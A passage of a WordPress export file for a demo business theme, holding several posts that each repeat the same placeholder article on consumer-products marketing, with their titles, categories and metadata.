		<wp:post_type><![CDATA[post]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
										<category domain="category" nicename="business"><![CDATA[business]]></category>
		<category domain="post_tag" nicename="consulting"><![CDATA[consulting]]></category>
		<category domain="post_format" nicename="post-format-audio"><![CDATA[Audio]]></category>
		<category domain="post_tag" nicename="trading"><![CDATA[trading]]></category>
						<wp:postmeta>
		<wp:meta_key><![CDATA[_edit_last]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[post_audio]]></wp:meta_key>
		<wp:meta_value><![CDATA[https://w.soundcloud.com/player/?url=https%3A//api.soundcloud.com/tracks/139083759]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[slide_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[rs_page_bg_color]]></wp:meta_key>
		<wp:meta_value><![CDATA[#ffffff]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[text_link]]></wp:meta_key>
		<wp:meta_value><![CDATA[The Future of Marketing in Consumer Products]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[post_link]]></wp:meta_key>
		<wp:meta_value><![CDATA[#]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_page_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_old_date]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020-09-04]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_old_slug]]></wp:meta_key>
		<wp:meta_value><![CDATA[digital-transformation-roadmap-enablers]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_old_slug]]></wp:meta_key>
		<wp:meta_value><![CDATA[entering-the-next-phase-of-digital-transformation-2]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>In Media, Trimming Costs Boosts Value Transform</title>
		<link>http://wpdemo.archiwp.com/maxbizz/in-media-trimming-costs-boosts-value-transform/</link>
		<pubDate>Tue, 09 Jan 2018 08:49:00 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz/?p=423</guid>
		<description></description>
		<content:encoded><![CDATA[<span class="drop-cap"><span class="drop-cap-letter">N</span></span> ot so long ago, marketing consumer products felt like a genteel game of lawn tennis: Established competitors invested in creative with long lead times, using proven models of TV and big-box retail, alongside trusted agency partners. Today, it’s more like a sprawling contest of mixed martial arts, with new competitors playing by different rules; an unprecedented complexity of channels, <span style="color: #ff8523;">content and partners; and a step change</span> in speed and ways of working that has punches flying at incumbent consumer products companies.

<span style="color: #1b1d21; font-weight: 600;">Fueling the blur of combat is a radical shift in brand growth models.</span> Within the span of most executives’ careers, advances in technology have reshaped how consumers engage with brands. In the US and UK, more than 60% of consumers now discover products online, and 85% of millennials trust reviews from a faceless stranger more than traditional advertising. The same technology advances have dramatically altered the competitive landscape. CMOs can no longer forecast forward their current profit pools only by looking to fill in geographies and nearby product market segments. That process risks ignoring the industry’s disruptive trends, as profit pools shift quickly from products to services to experiences and communities, and as mass products evolve into new segments with accelerating personalization. <em>Growth strategy today requires consumer products companies to look “present forward” and “future back”—to create a faster horse while envisioning the car—in order to define new growth platforms beyond their current products, business model and capabilities.</em>

<img class="alignnone size-full wp-image-417" src="https://maxbizz.s3.amazonaws.com/images/post.jpg" alt="" width="870" height="350">
<h5><strong>Upgrade Content Creation Capabilities</strong></h5>
Fueling the blur of combat is a radical shift in brand growth models. Within the span of most executives’ careers, advances in technology have reshaped how consumers engage with brands. In the US and UK, more than 60% of consumers now discover products online, and 85% of millennials trust reviews from a faceless stranger more than traditional advertising. <span style="color: #1b1d21; font-weight: 600;">The same technology advances have dramatically</span> altered the competitive landscape. However, the transformation still required across the industry is significant, involving far-reaching changes to consumer products companies’ growth models and the largest buckets of their discretionary spending. And it’s urgent, as consumers and new competitors are moving faster than incumbents can react.
<blockquote>
<p style="text-align: center; line-height: 36px;">“I cannot give you the formula for success, but I can give you the formula for failure. It is: Try to please everybody.”
<cite>DAVID OSWALD</cite></p>
</blockquote>
What’s the right path forward? Reinventing the brand growth model requires more than a reallocation of marketing budget to digital. CMOs need a reassessment of growth platforms and future brand portfolios, a new understanding of the consumer journey, a supporting strategy on data and technology.

<em>The consumer journey has fundamentally changed, and so has the role of the brand manager. Once guardians of the brief to agencies, today they must lead hands-on content generation, data management.</em>]]></content:encoded>
		<excerpt:encoded><![CDATA[Most firms have set up a war room to triage their immediate response to the crisis. But the lack of visibility around future demand complicates efforts to restart stalled portfolio companies...]]></excerpt:encoded>
		<wp:post_id>423</wp:post_id>
		<wp:post_date><![CDATA[2018-01-09 08:49:00]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2018-01-09 08:49:00]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[open]]></wp:ping_status>
		<wp:post_name><![CDATA[in-media-trimming-costs-boosts-value-transform]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[post]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
										<category domain="post_tag" nicename="business"><![CDATA[business]]></category>
		<category domain="category" nicename="consulting"><![CDATA[consulting]]></category>
		<category domain="category" nicename="finance"><![CDATA[finance]]></category>
		<category domain="post_format" nicename="post-format-link"><![CDATA[Link]]></category>
		<category domain="post_tag" nicename="tips"><![CDATA[tips]]></category>
						<wp:postmeta>
		<wp:meta_key><![CDATA[_edit_last]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[slide_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[rs_page_bg_color]]></wp:meta_key>
		<wp:meta_value><![CDATA[#ffffff]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[post_link]]></wp:meta_key>
		<wp:meta_value><![CDATA[#]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[text_link]]></wp:meta_key>
		<wp:meta_value><![CDATA[The Future of Marketing in Consumer Products]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_page_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_old_date]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020-09-04]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_old_slug]]></wp:meta_key>
		<wp:meta_value><![CDATA[the-future-of-retail-asias-ecosystems]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_old_slug]]></wp:meta_key>
		<wp:meta_value><![CDATA[in-media-trimming-costs-boosts-value-transform-2]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>The Future of Retail: Asia’s Ecosystems</title>
		<link>http://wpdemo.archiwp.com/maxbizz/the-future-of-retail-asias-ecosystems/</link>
		<pubDate>Mon, 24 Feb 2020 09:00:43 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz/?p=430</guid>
		<description></description>
		<content:encoded><![CDATA[<span class="drop-cap"><span class="drop-cap-letter">N</span></span> ot so long ago, marketing consumer products felt like a genteel game of lawn tennis: Established competitors invested in creative with long lead times, using proven models of TV and big-box retail, alongside trusted agency partners. Today, it’s more like a sprawling contest of mixed martial arts, with new competitors playing by different rules; an unprecedented complexity of channels, <span style="color: #ff8523;">content and partners; and a step change</span> in speed and ways of working that has punches flying at incumbent consumer products companies.

<span style="color: #1b1d21; font-weight: 600;">Fueling the blur of combat is a radical shift in brand growth models.</span> Within the span of most executives’ careers, advances in technology have reshaped how consumers engage with brands. In the US and UK, more than 60% of consumers now discover products online, and 85% of millennials trust reviews from a faceless stranger more than traditional advertising. The same technology advances have dramatically altered the competitive landscape. CMOs can no longer forecast forward their current profit pools only by looking to fill in geographies and nearby product market segments. That process risks ignoring the industry’s disruptive trends, as profit pools shift quickly from products to services to experiences and communities, and as mass products evolve into new segments with accelerating personalization. <em>Growth strategy today requires consumer products companies to look “present forward” and “future back”—to create a faster horse while envisioning the car—in order to define new growth platforms beyond their current products, business model and capabilities.</em>

<img class="alignnone size-full wp-image-417" src="https://maxbizz.s3.amazonaws.com/images/post.jpg" alt="" width="870" height="350">
<h5><strong>Upgrade Content Creation Capabilities</strong></h5>
Fueling the blur of combat is a radical shift in brand growth models. Within the span of most executives’ careers, advances in technology have reshaped how consumers engage with brands. In the US and UK, more than 60% of consumers now discover products online, and 85% of millennials trust reviews from a faceless stranger more than traditional advertising. <span style="color: #1b1d21; font-weight: 600;">The same technology advances have dramatically</span> altered the competitive landscape. However, the transformation still required across the industry is significant, involving far-reaching changes to consumer products companies’ growth models and the largest buckets of their discretionary spending. And it’s urgent, as consumers and new competitors are moving faster than incumbents can react.
<blockquote>
<p style="text-align: center; line-height: 36px;">“I cannot give you the formula for success, but I can give you the formula for failure. It is: Try to please everybody.”
<cite>DAVID OSWALD</cite></p>
</blockquote>
What’s the right path forward? Reinventing the brand growth model requires more than a reallocation of marketing budget to digital. CMOs need a reassessment of growth platforms and future brand portfolios, a new understanding of the consumer journey, a supporting strategy on data and technology.

<em>The consumer journey has fundamentally changed, and so has the role of the brand manager. Once guardians of the brief to agencies, today they must lead hands-on content generation, data management.</em>]]></content:encoded>
		<excerpt:encoded><![CDATA[Most firms have set up a war room to triage their immediate response to the crisis. But the lack of visibility around future demand complicates efforts to restart stalled portfolio companies...]]></excerpt:encoded>
		<wp:post_id>430</wp:post_id>
		<wp:post_date><![CDATA[2020-02-24 09:00:43]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-02-24 09:00:43]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[open]]></wp:ping_status>
		<wp:post_name><![CDATA[the-future-of-retail-asias-ecosystems]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[post]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
										<category domain="post_tag" nicename="analysis"><![CDATA[analysis]]></category>
		<category domain="category" nicename="business"><![CDATA[business]]></category>
		<category domain="post_tag" nicename="business"><![CDATA[business]]></category>
		<category domain="category" nicename="marketing"><![CDATA[marketing]]></category>
		<category domain="post_format" nicename="post-format-video"><![CDATA[Video]]></category>
						<wp:postmeta>
		<wp:meta_key><![CDATA[_edit_last]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[slide_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[rs_page_bg_color]]></wp:meta_key>
		<wp:meta_value><![CDATA[#ffffff]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[post_video]]></wp:meta_key>
		<wp:meta_value><![CDATA[https://vimeo.com/87959439]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_page_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_old_date]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020-09-04]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_old_slug]]></wp:meta_key>
		<wp:meta_value><![CDATA[in-media-trimming-costs-boosts-value-transform]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_thumbnail_id]]></wp:meta_key>
		<wp:meta_value><![CDATA[438]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[bg_video]]></wp:meta_key>
		<wp:meta_value><![CDATA[432]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>Digital Transformation Roadmap: Enablers</title>
		<link>http://wpdemo.archiwp.com/maxbizz/digital-transformation-roadmap-enablers/</link>
		<pubDate>Wed, 14 Aug 2019 09:02:49 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz/?p=434</guid>
		<description></description>
		<content:encoded><![CDATA[<span class="drop-cap"><span class="drop-cap-letter">N</span></span> ot so long ago, marketing consumer products felt like a genteel game of lawn tennis: Established competitors invested in creative with long lead times, using proven models of TV and big-box retail, alongside trusted agency partners. Today, it’s more like a sprawling contest of mixed martial arts, with new competitors playing by different rules; an unprecedented complexity of channels, <span style="color: #ff8523;">content and partners; and a step change</span> in speed and ways of working that has punches flying at incumbent consumer products companies.

<span style="color: #1b1d21; font-weight: 600;">Fueling the blur of combat is a radical shift in brand growth models.</span> Within the span of most executives’ careers, advances in technology have reshaped how consumers engage with brands. In the US and UK, more than 60% of consumers now discover products online, and 85% of millennials trust reviews from a faceless stranger more than traditional advertising. The same technology advances have dramatically altered the competitive landscape. CMOs can no longer forecast forward their current profit pools only by looking to fill in geographies and nearby product market segments. That process risks ignoring the industry’s disruptive trends, as profit pools shift quickly from products to services to experiences and communities, and as mass products evolve into new segments with accelerating personalization. <em>Growth strategy today requires consumer products companies to look “present forward” and “future back”—to create a faster horse while envisioning the car—in order to define new growth platforms beyond their current products, business model and capabilities.</em>

<img class="alignnone size-full wp-image-417" src="https://maxbizz.s3.amazonaws.com/images/post.jpg" alt="" width="870" height="350">
<h5><strong>Upgrade Content Creation Capabilities</strong></h5>
Fueling the blur of combat is a radical shift in brand growth models. Within the span of most executives’ careers, advances in technology have reshaped how consumers engage with brands. In the US and UK, more than 60% of consumers now discover products online, and 85% of millennials trust reviews from a faceless stranger more than traditional advertising. <span style="color: #1b1d21; font-weight: 600;">The same technology advances have dramatically</span> altered the competitive landscape. However, the transformation still required across the industry is significant, involving far-reaching changes to consumer products companies’ growth models and the largest buckets of their discretionary spending. And it’s urgent, as consumers and new competitors are moving faster than incumbents can react.
<blockquote>
<p style="text-align: center; line-height: 36px;">“I cannot give you the formula for success, but I can give you the formula for failure. It is: Try to please everybody.”
<cite>DAVID OSWALD</cite></p>
</blockquote>
What’s the right path forward? Reinventing the brand growth model requires more than a reallocation of marketing budget to digital. CMOs need a reassessment of growth platforms and future brand portfolios, a new understanding of the consumer journey, a supporting strategy on data and technology.

<em>The consumer journey has fundamentally changed, and so has the role of the brand manager. Once guardians of the brief to agencies, today they must lead hands-on content generation, data management.</em>]]></content:encoded>
		<excerpt:encoded><![CDATA[Most firms have set up a war room to triage their immediate response to the crisis. But the lack of visibility around future demand complicates efforts to restart stalled portfolio companies...]]></excerpt:encoded>
		<wp:post_id>434</wp:post_id>
		<wp:post_date><![CDATA[2019-08-14 09:02:49]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2019-08-14 09:02:49]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[open]]></wp:ping_status>
		<wp:post_name><![CDATA[digital-transformation-roadmap-enablers]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[post]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
										<category domain="post_tag" nicename="finance"><![CDATA[finance]]></category>
		<category domain="category" nicename="marketing"><![CDATA[marketing]]></category>
		<category domain="post_format" nicename="post-format-quote"><![CDATA[Quote]]></category>
		<category domain="post_tag" nicename="tips"><![CDATA[tips]]></category>
						<wp:postmeta>
		<wp:meta_key><![CDATA[_edit_last]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[post_quote]]></wp:meta_key>
		<wp:meta_value><![CDATA[I cannot give you the formula for success, but I can give you the 
formula for failure. It is: Try to please everybody.]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[quote_name]]></wp:meta_key>
		<wp:meta_value><![CDATA[David Oswald]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[slide_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[rs_page_bg_color]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_page_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_thumbnail_id]]></wp:meta_key>
		<wp:meta_value><![CDATA[439]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_old_date]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020-09-04]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_old_slug]]></wp:meta_key>
		<wp:meta_value><![CDATA[entering-the-next-phase-of-digital-transformation]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>How to Write a Successful Grant Application</title>
		<link>http://wpdemo.archiwp.com/maxbizz/how-to-write-a-successful-grant-application/</link>
		<pubDate>Thu, 08 Nov 2018 09:04:46 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz/?p=436</guid>
		<description></description>
		<content:encoded><![CDATA[<span class="drop-cap"><span class="drop-cap-letter">N</span></span> ot so long ago, marketing consumer products felt like a genteel game of lawn tennis: Established competitors invested in creative with long lead times, using proven models of TV and big-box retail, alongside trusted agency partners. Today, it’s more like a sprawling contest of mixed martial arts, with new competitors playing by different rules; an unprecedented complexity of channels, <span style="color: #ff8523;">content and partners; and a step change</span> in speed and ways of working that has punches flying at incumbent consumer products companies.

<span style="color: #1b1d21; font-weight: 600;">Fueling the blur of combat is a radical shift in brand growth models.</span> Within the span of most executives’ careers, advances in technology have reshaped how consumers engage with brands. In the US and UK, more than 60% of consumers now discover products online, and 85% of millennials trust reviews from a faceless stranger more than traditional advertising. The same technology advances have dramatically altered the competitive landscape. CMOs can no longer forecast forward their current profit pools only by looking to fill in geographies and nearby product market segments. That process risks ignoring the industry’s disruptive trends, as profit pools shift quickly from products to services to experiences and communities, and as mass products evolve into new segments with accelerating personalization. <em>Growth strategy today requires consumer products companies to look “present forward” and “future back”—to create a faster horse while envisioning the car—in order to define new growth platforms beyond their current products, business model and capabilities.</em>

<img class="alignnone size-full wp-image-417" src="https://maxbizz.s3.amazonaws.com/images/post.jpg" alt="" width="870" height="350">
<h5><strong>Upgrade Content Creation Capabilities</strong></h5>
Fueling the blur of combat is a radical shift in brand growth models. Within the span of most executives’ careers, advances in technology have reshaped how consumers engage with brands. In the US and UK, more than 60% of consumers now discover products online, and 85% of millennials trust reviews from a faceless stranger more than traditional advertising. <span style="color: #1b1d21; font-weight: 600;">The same technology advances have dramatically</span> altered the competitive landscape. However, the transformation still required across the industry is significant, involving far-reaching changes to consumer products companies’ growth models and the largest buckets of their discretionary spending. And it’s urgent, as consumers and new competitors are moving faster than incumbents can react.
<blockquote>
<p style="text-align: center; line-height: 36px;">“I cannot give you the formula for success, but I can give you the formula for failure. It is: Try to please everybody.”
<cite>DAVID OSWALD</cite></p>
</blockquote>
What’s the right path forward? Reinventing the brand growth model requires more than a reallocation of marketing budget to digital. CMOs need a reassessment of growth platforms and future brand portfolios, a new understanding of the consumer journey, a supporting strategy on data and technology.

<em>The consumer journey has fundamentally changed, and so has the role of the brand manager. Once guardians of the brief to agencies, today they must lead hands-on content generation, data management.</em>]]></content:encoded>
		<excerpt:encoded><![CDATA[Most firms have set up a war room to triage their immediate response to the crisis. But the lack of visibility around future demand complicates efforts to restart stalled portfolio companies...]]></excerpt:encoded>
		<wp:post_id>436</wp:post_id>
		<wp:post_date><![CDATA[2018-11-08 09:04:46]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2018-11-08 09:04:46]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[open]]></wp:ping_status>
		<wp:post_name><![CDATA[how-to-write-a-successful-grant-application]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[post]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
										<category domain="post_tag" nicename="consulting"><![CDATA[consulting]]></category>
		<category domain="category" nicename="finance"><![CDATA[finance]]></category>
		<category domain="post_format" nicename="post-format-gallery"><![CDATA[Gallery]]></category>
		<category domain="post_tag" nicename="strategy"><![CDATA[strategy]]></category>
						<wp:postmeta>
		<wp:meta_key><![CDATA[_edit_last]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[slide_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[rs_page_bg_color]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_page_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[post_gallery]]></wp:meta_key>
		<wp:meta_value><![CDATA[438]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[post_gallery]]></wp:meta_key>
		<wp:meta_value><![CDATA[439]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[post_gallery]]></wp:meta_key>
		<wp:meta_value><![CDATA[440]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_old_date]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020-09-04]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_old_date]]></wp:meta_key>
		<wp:meta_value><![CDATA[2018-11-04]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>Crowdfunding. How to Get Funding Online?</title>
		<link>http://wpdemo.archiwp.com/maxbizz/crowdfunding-how-to-get-funding-online/</link>
		<pubDate>Sun, 04 Mar 2018 09:07:57 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz/?p=444</guid>
		<description></description>
		<content:encoded><![CDATA[<span class="drop-cap"><span class="drop-cap-letter">N</span></span> ot so long ago, marketing consumer products felt like a genteel game of lawn tennis: Established competitors invested in creative with long lead times, using proven models of TV and big-box retail, alongside trusted agency partners. Today, it’s more like a sprawling contest of mixed martial arts, with new competitors playing by different rules; an unprecedented complexity of channels, <span style="color: #ff8523;">content and partners; and a step change</span> in speed and ways of working that has punches flying at incumbent consumer products companies.

<span style="color: #1b1d21; font-weight: 600;">Fueling the blur of combat is a radical shift in brand growth models.</span> Within the span of most executives’ careers, advances in technology have reshaped how consumers engage with brands. In the US and UK, more than 60% of consumers now discover products online, and 85% of millennials trust reviews from a faceless stranger more than traditional advertising. The same technology advances have dramatically altered the competitive landscape. CMOs can no longer forecast forward their current profit pools only by looking to fill in geographies and nearby product market segments. That process risks ignoring the industry’s disruptive trends, as profit pools shift quickly from products to services to experiences and communities, and as mass products evolve into new segments with accelerating personalization. <em>Growth strategy today requires consumer products companies to look “present forward” and “future back”—to create a faster horse while envisioning the car—in order to define new growth platforms beyond their current products, business model and capabilities.</em>

<img class="alignnone size-full wp-image-417" src="https://maxbizz.s3.amazonaws.com/images/post.jpg" alt="" width="870" height="350" />
<h5><strong>Upgrade Content Creation Capabilities</strong></h5>
Fueling the blur of combat is a radical shift in brand growth models. Within the span of most executives’ careers, advances in technology have reshaped how consumers engage with brands. In the US and UK, more than 60% of consumers now discover products online, and 85% of millennials trust reviews from a faceless stranger more than traditional advertising. <span style="color: #1b1d21; font-weight: 600;">The same technology advances have dramatically</span> altered the competitive landscape. However, the transformation still required across the industry is significant, involving far-reaching changes to consumer products companies’ growth models and the largest buckets of their discretionary spending. And it’s urgent, as consumers and new competitors are moving faster than incumbents can react.
<blockquote>
<p style="text-align: center; line-height: 36px;">“I cannot give you the formula for success, but I can give you the formula for failure. It is: Try to please everybody.”
<cite>DAVID OSWALD</cite></p>
</blockquote>
What’s the right path forward? Reinventing the brand growth model requires more than a reallocation of marketing budget to digital. CMOs need a reassessment of growth platforms and future brand portfolios, a new understanding of the consumer journey, a supporting strategy on data and technology.

<em>The consumer journey has fundamentally changed, and so has the role of the brand manager. Once guardians of the brief to agencies, today they must lead hands-on content generation, data management.</em>]]></content:encoded>
		<excerpt:encoded><![CDATA[Most firms have set up a war room to triage their immediate response to the crisis. But the lack of visibility around future demand complicates efforts to restart stalled portfolio companies...]]></excerpt:encoded>
		<wp:post_id>444</wp:post_id>
		<wp:post_date><![CDATA[2018-03-04 09:07:57]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2018-03-04 09:07:57]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[open]]></wp:ping_status>
		<wp:post_name><![CDATA[crowdfunding-how-to-get-funding-online]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[post]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
										<category domain="category" nicename="business"><![CDATA[business]]></category>
		<category domain="post_tag" nicename="consulting"><![CDATA[consulting]]></category>
		<category domain="category" nicename="consulting"><![CDATA[consulting]]></category>
		<category domain="post_tag" nicename="marketing"><![CDATA[marketing]]></category>
						<wp:postmeta>
		<wp:meta_key><![CDATA[_edit_last]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[slide_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[rs_page_bg_color]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_page_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_old_date]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020-09-04]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>Contactless Payments’ Time Has Come</title>
		<link>http://wpdemo.archiwp.com/maxbizz/contactless-payments-time-has-come/</link>
		<pubDate>Fri, 04 Sep 2020 09:09:22 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz/?p=447</guid>
		<description></description>
		<content:encoded><![CDATA[<span class="drop-cap"><span class="drop-cap-letter">N</span></span> ot so long ago, marketing consumer products felt like a genteel game of lawn tennis: Established competitors invested in creative with long lead times, using proven models of TV and big-box retail, alongside trusted agency partners. Today, it’s more like a sprawling contest of mixed martial arts, with new competitors playing by different rules; an unprecedented complexity of channels, <span style="color: #ff8523;">content and partners; and a step change</span> in speed and ways of working that has punches flying at incumbent consumer products companies.

